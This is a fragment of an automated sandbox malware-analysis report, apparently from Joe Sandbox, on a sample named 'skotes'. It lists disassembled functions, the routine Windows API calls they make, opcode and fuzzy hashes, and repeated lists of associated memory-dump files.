                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateSleepThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4202482776-0
                                                                                                                                              • Opcode ID: 3f7075ae21071cbe051501ae2a10001984a94b7d474ad0fe30bab9cf7ce6c77b
                                                                                                                                              • Instruction ID: 6d20f71b382fdeb950df7f04c05b36a9693e4fe3457e24c9ad85765341071deb
                                                                                                                                              • Opcode Fuzzy Hash: 3f7075ae21071cbe051501ae2a10001984a94b7d474ad0fe30bab9cf7ce6c77b
                                                                                                                                              • Instruction Fuzzy Hash: F1D012387C0314B6F22002202C0BFA6AA209B0AF11F26484673483F0D081E8B04086AC
                                                                                                                                              Function 00408380 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408524
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1721193555-0
                                                                                                                                              • Opcode ID: 0de6832095093fdfe7075a4153fc6db1361a450ea81db82728210559b1eb16ab
                                                                                                                                              • Instruction ID: 8126d5e6d2798db8ff8b1aed180b41236615454edead62a88bb6e246a916662f
                                                                                                                                              • Opcode Fuzzy Hash: 0de6832095093fdfe7075a4153fc6db1361a450ea81db82728210559b1eb16ab
                                                                                                                                              • Instruction Fuzzy Hash: 5E511770D04218ABEB24EB68CE457DEB775DB46314F5042AEE844B72C1EF385EC48B99
                                                                                                                                              Function 00437124 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,0043705B,?,?,00000000,00000000), ref: 00437166
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$LocalSpecificSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2574697306-0
                                                                                                                                              • Opcode ID: 62e65f4d8da622eb70b14d9b15abd77cc87309fc1652166b095653a064e818f4
                                                                                                                                              • Instruction ID: 8b5364c4de45954e99c11eb84121b7b09905eacc119d0819985baf020b288db8
                                                                                                                                              • Opcode Fuzzy Hash: 62e65f4d8da622eb70b14d9b15abd77cc87309fc1652166b095653a064e818f4
                                                                                                                                              • Instruction Fuzzy Hash: 3A111FB390410CABDF10DE95C981EDF77BCAB0D310F605267E551E2280EA34EA55CB65
                                                                                                                                              Function 0043AC53 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wsopen_s
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3347428461-0
                                                                                                                                              • Opcode ID: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
                                                                                                                                              • Instruction ID: a66abbd6648e96b8c426010f02d88ffd1877682ffd29169a79776235427ef3c3
                                                                                                                                              • Opcode Fuzzy Hash: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
                                                                                                                                              • Instruction Fuzzy Hash: 551118B1A0420AAFCB05DF59E94199B7BF4EF48304F04406AF805AB351D670DD21DB69
                                                                                                                                              Function 0043D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0043A813,00000001,00000364,00000006,000000FF,?,0041D3FC,EBA58D57,?,00417A8B,?), ref: 0043D870
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
